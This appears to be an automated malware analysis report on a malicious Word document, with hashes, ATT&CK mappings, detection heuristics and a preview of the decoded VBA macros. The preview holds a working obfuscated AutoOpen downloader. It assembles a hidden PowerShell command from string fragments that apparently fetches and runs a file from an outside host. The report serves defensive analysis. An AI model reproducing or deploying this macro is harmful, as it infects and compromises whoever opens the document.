Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 244b4205acb41670…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 47.5 KB
Created: 2017-01-07 22:06:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 1a7d5e0fe2288a2fd4910c685b9142b3
SHA-1: 63a5e7851c9146554e2e5cef467f7d78c734169a
SHA-256: 244b4205acb416700bec459c8b36be379c0b7e3d2a21a57c4a121ba95d229bc4
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including an AutoOpen macro that leads to a critical Shell() call, indicating malicious intent. The SE_ENABLE_LURE heuristic indicates that the document tries to trick the user into enabling macros. The ClamAV detection (Doc.Trojan.X-Mas-5635802-0) and the extracted macro source (macros.bas) further support its malicious nature. The macro assembles its command line at run time from many short string fragments before passing it to Shell(); the obfuscated command likely downloads and executes a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Trojan.X-Mas-5635802-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.X-Mas-5635802-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12475 bytes
SHA-256: 10aca1c8671db42d67b4ee5f28720f42915cb36ca19573a8e84080b4274786c0

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "mode"
Sub ladmo()

rbe = "PD"
yg = "h^"
rz = "^T"
da = ".w"
p = "t "
kfa = "^N"
uvr = "  "
esx = "^ "
ok = "S^"
xh = "Ow"
tze = "^w"
mpa = "'"""
azv = "FI"
ywk = "oN"
ca = ";S"
yhc = "io"
wxa = "^o"
Z = "  "
gy = "po"
ps = "BJ"
fy = "Xe"
xso = "xe"
jf = "TI"
wy = "Pr"
t = "  "
azh = "'%"
ibh = "')"
us = "t^"
dc = "^D"
yl = "C^"
ki = "a%"
ynx = "^O"
ze = "^e"
ilg = "E^"
kh = "-^"
od = "  "
wu = "^a"
qju = "^E"
uw = "a%"
x = "E^"
vpo = "/P"
j = ".e"
eh = "eW"
v = "rs"
yh = "Cl"
u = "D."
yp = "//"
c = ".h"
kz = "SY"
d = "  "
pga = "tt"
pl = "',"
wso = "-E"
om = "c^"
iv = " ^"
vj = "S^"
um = ")^"
f = " b"
a = "XE"
wn = "E "
fz = ".E"
bs = "^o"
gby = "os"
jc = "3/"
uzj = "PO"
yqs = "^R"
che = "I^"
ci = "Oa"
opw = "  "
nm = "mp"
k = "er"
ajb = "'%"
vn = "nL"
hr = "LI"
se = "U^"
mnywig = ActiveDocument.DefaultTableStyle
cy = "s^"
E = "Cy"
s = "E^"
he = "Cm"
ol = "E("
icc = "Pr"
efg = "cE"
jhi = "^b"
lho = "XE"
xgu = "^o"
zq = "M."
ew = "LI"
ak = "T^"
egn = "ap"
elq = "^l"
bf = "  "
o = "^w"
ivp = "N^"
sdo = "T^"
ma = "44"
b = "-N"
igf = "^c"
ik = "nD"
eb = "Wi"
wc = "Yp"
gk = "ie"
gi = "nt"
okc = "At"
ep = "on"
xga = "n1"
ivk = "D^"
i = "Yl"
zwy = "aT"
y = "ss"
wga = ".e"
pb = "HI"
ne = "t:"
yk = "p:"
uz = "L^"
ihv = "Nt"
zu = "D^"
ml = "ap"
ub = "EL"
fj = "te"
kg = "  "
kky = "Ta"
pi = "/c"
wq = "^ "
py = " ^"
ym = "-^"
sy = "De"
bg = "xe"
dzi = "^-"
n = "Le"
yzq = "(N"
ums = "S "
eg = "E "
l = "Ex"
ur = "Of"
re = " """
pdy = "pd"
xpi = "GP"
eqf = "e^"
ck = ".^"
irn = ".e"
q = "'h"
icovog = he + u + l + eg + pi + re + uzj + o + s + v + yg + ub + uz + wga + a + uvr + iv + wso + xso + igf + se + jf + ywk + gy + ew + E + Z + opw + f + wc + wu + y + esx + kg + od + b + ynx + icc + ur + che + n + bf + ym + eb + ik + xgu + tze + ok + ak + i + wn + py + pb + zu + sy + kfa + wq + t + yzq + eh + dzi + wxa + ps + x + om + p + d + kz + cy + us + eqf + zq + ivp + ilg + sdo + da + ze + jhi + yl + hr + qju + ihv + um + ck + ivk + xh + vn + ci + dc + azv + elq + ol + q + pga + yk + yp + ep + yhc + xga + c + gby + ne + ma + jc + fj + nm + k + vpo + xpi + yh + gk + gi + j + bg + pl + azh + egn + rbe + zwy + ki + irn + fy + ibh + ca + kky + yqs + rz + kh + wy + bs + efg + vj + ums + ajb + ml + pdy + okc + uw + fz + lho + mpa

If mnywig = "" Then
Shell icovog, 0
End If
End Sub
Sub AutoOpen()
ladmo
End Sub

' Processing file: /opt/analyzer/scan_staging/703291eb819f4703943c783f6f869ee2.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1088 bytes
' Macros/VBA/Module1 - 831 bytes
' Macros/VBA/Module2 - 831 bytes
' Macros/VBA/mode - 7652 bytes
... (truncated)